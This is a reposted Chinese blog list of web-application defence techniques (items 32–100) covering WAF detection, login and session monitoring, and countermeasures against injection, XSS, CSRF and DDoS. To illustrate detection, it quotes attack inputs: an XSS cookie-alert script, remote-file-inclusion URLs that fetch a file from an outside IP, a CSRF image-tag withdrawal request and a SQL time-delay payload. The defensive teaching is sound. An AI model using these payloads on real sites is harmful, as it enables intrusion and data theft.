第32技 識(shí)別異常的HTTP請(qǐng)求方法 制定HTTP請(qǐng)求白名單,例如只允許GET、POST、HEAD
第33技 識(shí)別不符合RFC 2616定義的URI格式
第34技 識(shí)別HTTP請(qǐng)求頭異常 例如HTTP請(qǐng)求頭缺失、請(qǐng)求頭排列順序異常、請(qǐng)求頭取值異常
第35技 通過(guò)多余參數(shù)識(shí)別攻擊
第36技 通過(guò)缺失參數(shù)識(shí)別攻擊
第37技 通過(guò)重復(fù)參數(shù)(HPP)識(shí)別攻擊 腦洞:正常的應(yīng)用也會(huì)出現(xiàn)重復(fù)參數(shù)的情況,why!!!
第38技 通過(guò)參數(shù)取值長(zhǎng)度異常識(shí)別攻擊
第39技 通過(guò)參數(shù)取值字符類型異常識(shí)別攻擊 采取參數(shù)取值白名單的方式來(lái)防御
第40技?識(shí)別HTTP響應(yīng)頭異常 例如5xx錯(cuò)誤的比例,HTTP響應(yīng)拆分,惡意的重定向
第41技 預(yù)防HTTP響應(yīng)頭中的信息泄漏 移除或偽造服務(wù)簽名響應(yīng)頭,例如Server,X-Powerd-By,X-AspNet-Version
第42技 按需解析HTTP響應(yīng)體 響應(yīng)體的檢測(cè)是極其消耗性能的,所以要參照安全級(jí)別謹(jǐn)慎設(shè)置如何解析HTTP響應(yīng)體
第43技 檢測(cè)網(wǎng)頁(yè)篡改-標(biāo)題篡改
第44技 檢測(cè)網(wǎng)頁(yè)篡改-響應(yīng)體長(zhǎng)度異常 網(wǎng)頁(yè)內(nèi)容被篡改或后端DB被拖庫(kù)時(shí),響應(yīng)體的大小會(huì)發(fā)生明顯的變化 2015-12-11: ?掛馬并不會(huì)發(fā)生大的變化,常見(jiàn)拖庫(kù)行為是否會(huì)引發(fā)明顯變化,需要試驗(yàn)后給出結(jié)論(也是繼webshell檢測(cè)后計(jì)劃試驗(yàn)的)
第45技 檢測(cè)網(wǎng)頁(yè)篡改-響應(yīng)體動(dòng)態(tài)內(nèi)容篡改 例如在表單注入一段<script>alert(document.cookie);</script>,檢查響應(yīng)體中會(huì)出現(xiàn)新的JS標(biāo)簽,我們根據(jù)標(biāo)簽個(gè)數(shù)便能發(fā)現(xiàn)攻擊。
第46技 檢測(cè)響應(yīng)體中的源碼泄漏 例如php-cgi源碼泄漏漏洞CVE-201201823
第47技 檢測(cè)響應(yīng)體中的信息泄漏 例如響應(yīng)體中泄漏源碼絕對(duì)路徑,數(shù)據(jù)庫(kù)信息
第48技 通過(guò)異常的響應(yīng)時(shí)間來(lái)發(fā)現(xiàn)攻擊 例如基于時(shí)間的SQL盲注waitfor delay會(huì)造成異常的響應(yīng)時(shí)間
第49技 檢測(cè)響應(yīng)體中的用戶數(shù)據(jù)泄漏 例如信用卡號(hào)
第50技 檢測(cè)木馬、后門、webshell連接嘗試
第51技 監(jiān)測(cè)使用常用賬號(hào)進(jìn)行的登錄嘗試
例如使用admin administrator root system等作為用戶名來(lái)嘗試登錄第52技 監(jiān)測(cè)登錄口橫向暴力破解 使用同一個(gè)密碼,不同的用戶名來(lái)嘗試暴力破解
第53技 監(jiān)測(cè)失敗的登錄嘗試
第54技 監(jiān)測(cè)高頻率的登錄嘗試
第55技 使用統(tǒng)一的登錄失敗提示,避免有用信息泄漏 像錯(cuò)誤的用戶名或錯(cuò)誤的密碼這種提示會(huì)給暴力破解提供有效信息
第56技 啟用密碼復(fù)雜度檢測(cè)
第57技 分析一個(gè)會(huì)話期,登錄嘗試的用戶名來(lái)發(fā)現(xiàn)登錄口異常
第58技 檢測(cè)異常的cookie取值 基于會(huì)話的攻擊,包括可猜測(cè)的會(huì)話ID取值(burpsuite就集成了會(huì)話sequence分析工具)
第59技 檢測(cè)來(lái)自cookie字段的攻擊 例如cookie字段的SQL注入
第60技 設(shè)置會(huì)話有效期 防御會(huì)話固定攻擊
第61技 檢測(cè)一個(gè)會(huì)話期,請(qǐng)求者IP的GEO信息的變化
第62技 檢測(cè)一個(gè)會(huì)話期,請(qǐng)求者指紋的變化
該技術(shù)一般用于反欺詐系統(tǒng)用于識(shí)別用戶身份,包括訪問(wèn)者屏幕大小,時(shí)區(qū),語(yǔ)言設(shè)置,瀏覽器插件?
第63技 檢測(cè)請(qǐng)求者中的非ASCII字符 例如NULL字符%00 腦洞:看過(guò)naxsi基礎(chǔ)規(guī)則文件的會(huì)發(fā)現(xiàn),90%的規(guī)則都是檢測(cè)非ASCII字符第64技 檢測(cè)目錄遍歷攻擊 2015-12-11: ?猜后臺(tái)目錄/漏洞path是比較有效的滲透方法
第65技 ?檢測(cè)非正常流程的網(wǎng)站資源訪問(wèn) 控制URL進(jìn)行橫向權(quán)限提升,縱向權(quán)限提升操作 可以使用加密token(例如url hash)來(lái)防御任意資源訪問(wèn),如下所示 https://www.REDACTED.com/Cust/cust_5.php/222557/20040216?rv_token=abfb508403bbf7d78c3f8de1735d49f01b90eb71
第66技 檢測(cè)SQL注入攻擊 SQL注入的防御方法一般有三種 (1)SQL關(guān)鍵字過(guò)濾器 (2)SQL語(yǔ)義分析 (3)樸素貝葉斯異常分類(使用機(jī)器學(xué)習(xí)算法的異常檢測(cè)) 2015-12-11: ?
第67技 檢測(cè)遠(yuǎn)程文件包含漏洞 當(dāng)URI包含以下情況時(shí),極可能是一次攻擊請(qǐng)求 IP地址,例如/a.php?libdir=http://89.238.174.14/fx.txt??? PHP函數(shù),例如/?id={${include("http://xxx.xx.xx/fx.txt??)}} 多個(gè)?號(hào),例如/a.php?libdir=http://xxx.xx.xx/cgi??? 包含的host與Host頭的字段不符,例如/a.php?libdir=http://www.example.com
第68技 檢測(cè)操作系統(tǒng)命令執(zhí)行漏洞
第69技 檢測(cè)HTTP Request Smuggling HRS攻擊
第70技 檢測(cè)HTTP響應(yīng)拆分漏洞
第71技 檢測(cè)XML攻擊 例如XPath注入
?
第72技 使用CSP策略防御第73技 檢測(cè)XSS攻擊 XSS的防御方法一般有三種 (1)XSS關(guān)鍵字過(guò)濾器 (2)X-XSS-PROTECTION (3)javascript沙盒
第74技 檢測(cè)CRSF攻擊 CSRF防御方法:加密token
第75技 防御UI Redressing(clickjacking) clickjacking防御方法: (1)X-Frame-Options(2)frame-busting javascript
第76技 防御盜號(hào)木馬-中間人攻擊 盜號(hào)木馬一般會(huì)截獲HTTP請(qǐng)求,偽造登錄界面來(lái)盜取賬號(hào),而對(duì)這種釣魚攻擊的防御靈感來(lái)源于文件完整性檢測(cè)工具tripwires,使用JS注入響應(yīng)體md5值附加在登錄頁(yè)面來(lái)驗(yàn)證頁(yè)面完整性。
第77技 限制上傳文件的大小,避免超大文件上傳造成服務(wù)器的拒絕服務(wù)攻擊
第78技 限制上傳文件的數(shù)目,避免過(guò)多文件上傳造成服務(wù)器的拒絕服務(wù)攻擊
第79技 集成病毒掃描工具(例如ClamAV),檢測(cè)上傳文件是否為惡意文件
第80技 HTTP DDoS(CC)攻擊識(shí)別 比較有名的攻擊工具有l(wèi)ow orbit ion cannon LOIC,high orbit ion cannon HOIC 注意與第8技相同只監(jiān)控動(dòng)態(tài)頁(yè)面,因?yàn)殪o態(tài)資源的請(qǐng)求一般會(huì)緩存到CDN節(jié)點(diǎn)而到不了源站
第81技 HTTP slow DDoS攻擊識(shí)別 比較有名的攻擊工具有slowloris
第82技 通過(guò)檢測(cè)后續(xù)請(qǐng)求的響應(yīng)時(shí)間是否過(guò)快來(lái)檢測(cè)CSRF攻擊 例 如CSRF?<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=alice"> 受害者訪問(wèn)圖片標(biāo)簽的同時(shí)就發(fā)送了一個(gè)GET請(qǐng)求,兩個(gè)請(qǐng)求的間隔時(shí)間非常短
第83技 檢測(cè)異常的HTTP請(qǐng)求次序 自動(dòng)化攻擊往往會(huì)最小化操作步驟,我們可以參照第2技,第65技,增加token來(lái)預(yù)防自動(dòng)化攻擊
2015-12-11: ?基于圖的異常檢測(cè)方式比較有效,比如檢測(cè)孤立點(diǎn)來(lái)發(fā)現(xiàn)webshell(注意不能只有這個(gè)特征),比如監(jiān)測(cè)非常規(guī)路徑來(lái)發(fā)現(xiàn)越權(quán)訪問(wèn)
第84技 識(shí)別網(wǎng)站特定資源訪問(wèn)量的異常 當(dāng)網(wǎng)站的某個(gè)資源的訪問(wèn)量出現(xiàn)異常的時(shí)候,往往意味著攻擊發(fā)生了,例如新浪微博CSRF蠕蟲攻擊中自動(dòng)發(fā)微博接口的自動(dòng)調(diào)用
第85技 多個(gè)HTTP請(qǐng)求之間的聯(lián)動(dòng)分析
啟用協(xié)同檢測(cè)模式(規(guī)則評(píng)分制),例如單個(gè)IP/會(huì)話觸發(fā)的規(guī)則情況第86技 動(dòng)態(tài)開(kāi)啟WAF日志審計(jì) 例如當(dāng)收到來(lái)自IP黑名單的請(qǐng)求時(shí),開(kāi)啟日志審計(jì)功能
第87技 email發(fā)送WAF協(xié)同防御細(xì)節(jié)給站長(zhǎng) 可以調(diào)用外部email發(fā)送腳本也可以使用AuditConsole平臺(tái)(第11技中提到)發(fā)送
第88技 將WAF事件信息通過(guò)請(qǐng)求頭分享給其他安全組件來(lái)進(jìn)行聯(lián)動(dòng)分析 當(dāng)捕獲一個(gè)安全級(jí)別較低的攻擊時(shí),直接攔截就不是個(gè)好的選擇了,這時(shí)候就可以將WAF事件信息分享給其他安全組件進(jìn)行聯(lián)動(dòng)分析來(lái)執(zhí)行合理的應(yīng)對(duì)措施,而通過(guò)HTTP請(qǐng)求頭傳遞WAF事件信息就是個(gè)不錯(cuò)的方案(這種方法叫做request header tagging)。
第89技 將攻擊請(qǐng)求重定向到用戶友好的自定制攔截頁(yè)面
第90技 斷開(kāi)攻擊者的網(wǎng)絡(luò)連接 該措施常用于拒絕服務(wù)攻擊,例如CC攻擊
第91技 使用IP黑名單阻塞工具阻塞惡意用戶訪問(wèn) 一般會(huì)將User-Agent與IP地址聯(lián)合起來(lái)來(lái)阻塞惡意用戶訪問(wèn) 常見(jiàn)的黑名單阻塞工具有jwall-Rbld,Jwall?AuditConsole,?blacklist,samtool(snortsam)
第92技 動(dòng)態(tài)啟用基于IP-GEO信息的分級(jí)防御 例如發(fā)現(xiàn)大量攻擊者來(lái)自X國(guó),對(duì)X國(guó)啟用高級(jí)防御
第93技 通過(guò)延遲對(duì)請(qǐng)求的響應(yīng)時(shí)間來(lái)減緩自動(dòng)化攻擊,給防御者爭(zhēng)取時(shí)間來(lái)應(yīng)對(duì)攻擊
第94技 偽造攻擊成功的返回頁(yè)面來(lái)迷惑攻擊者,給防御者爭(zhēng)取時(shí)間來(lái)應(yīng)對(duì)攻擊 集成honeypot的防御思想
第95技 將攻擊請(qǐng)求代理到honeypot
第96技 當(dāng)檢測(cè)到會(huì)話異常時(shí),強(qiáng)制攻擊者登出 例如當(dāng)會(huì)話期間useragent發(fā)生變化時(shí),強(qiáng)制攻擊者登出
第97技 當(dāng)攻擊事件發(fā)生時(shí),鎖定攻擊者賬號(hào)一段時(shí)間?
第98技 使用JS注入cookie阻塞流量性攻擊(例如CC攻擊)
第99技 使用驗(yàn)證碼阻塞自動(dòng)化(機(jī)器)攻擊 例如自動(dòng)注冊(cè),自動(dòng)發(fā)送垃圾貼等機(jī)器人行為 腦洞:注意驗(yàn)證碼服務(wù)器要足夠健壯,以免招受拒絕服務(wù)攻擊時(shí)導(dǎo)致這一措施失效
第100技 集成BeFF(browser exploit framework)來(lái)分析惡意用戶請(qǐng)求
?
終于寫完了,我們會(huì)發(fā)現(xiàn)這100個(gè)防御技巧中出現(xiàn)了以下工具(規(guī)范或方法)
WAF(web 應(yīng)用防火墻),Snort(入侵檢測(cè)系統(tǒng)),OSVDB(開(kāi)源漏洞庫(kù)),honeypot(蜜罐),Arachni(漏洞掃描器),BeFF(漏洞挖掘框 架),ClamAV(殺毒軟件),tripwires(文件完整性校驗(yàn)工具,在web領(lǐng)域可以用來(lái)預(yù)防HTTP請(qǐng)求數(shù)據(jù)篡改,釣魚頁(yè)面?zhèn)卧旌妥詣?dòng)化提交請(qǐng) 求),RBL(實(shí)時(shí)IP黑庫(kù),IP信譽(yù)庫(kù)),URIBL Google Safe Browsing API(惡意網(wǎng)址庫(kù)),javascript sandbox(沙箱),SIEM(安全信息與事件管理平臺(tái)), SQL詞法分析器 ,HTTP RFC規(guī)范,編碼映射表,樸素貝葉斯分類算法
于是,可以很容易發(fā)現(xiàn)web安全防御是個(gè)整體,需要將各個(gè)組件(關(guān)卡)有效地聯(lián)動(dòng)起來(lái)形成壁壘,安全防御方法也是沒(méi)有嚴(yán)格的領(lǐng)域區(qū)分的,客戶端的安全技巧可以用于web,反之亦然,同時(shí)在解決某個(gè)安全問(wèn)題時(shí),如果找不到完善的單獨(dú)解決方案,不妨同時(shí)使用不同的有缺陷的防御方案,三個(gè)臭皮匠頂個(gè)諸葛亮。
?
2015-12-11: ? 現(xiàn)在出來(lái)了不少新概念的安全產(chǎn)品,仔細(xì)研究下來(lái)基本屬于以下兩種 (1)通用型安全產(chǎn)品:安全組件大禮包,比如說(shuō)集成web漏洞檢測(cè)、惡意軟件檢測(cè)、惡意網(wǎng)址檢測(cè)、DNS/DDoS檢測(cè)、情報(bào)信息(包括漏洞/攻擊事件feed,信息泄漏集成),將網(wǎng)絡(luò)層面的流量信息/系統(tǒng)層面的進(jìn)程日志信息 定向到安全組件中進(jìn)行檢測(cè),將結(jié)果聚合后展示在控制面板上(目前還沒(méi)有看到什么產(chǎn)品做到強(qiáng)聚合) 這種產(chǎn)品的特性是對(duì)誤報(bào)容忍性差,靜態(tài)檢測(cè)規(guī)則為主(2)垂直型安全產(chǎn)品:這種客戶都有著高端或更直接的安全需求,例如欺詐識(shí)別為主的業(yè)務(wù)安全、金融產(chǎn)品安全(比如說(shuō)支付終端漏洞,支付木馬),金融企業(yè)安全(針對(duì)金融行業(yè)的專業(yè)黑客攻擊)
這種產(chǎn)品的特性是對(duì)漏報(bào)容忍性差,個(gè)人感覺(jué)是研發(fā)代價(jià)比較大的數(shù)據(jù)安全分析技術(shù)更能發(fā)揮作用的地方
from: 碳基體
轉(zhuǎn)載于:https://www.cnblogs.com/elautoctrl/p/5047014.html
總結(jié)
以上是生活随笔為你收集整理的web应用安全防御100技 好书再次阅读, 变的只是表象,被概念迷惑的时候还是静下心来回顾本质...的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: break 与continue 语句
- 下一篇: SwipeRefreshLayout和R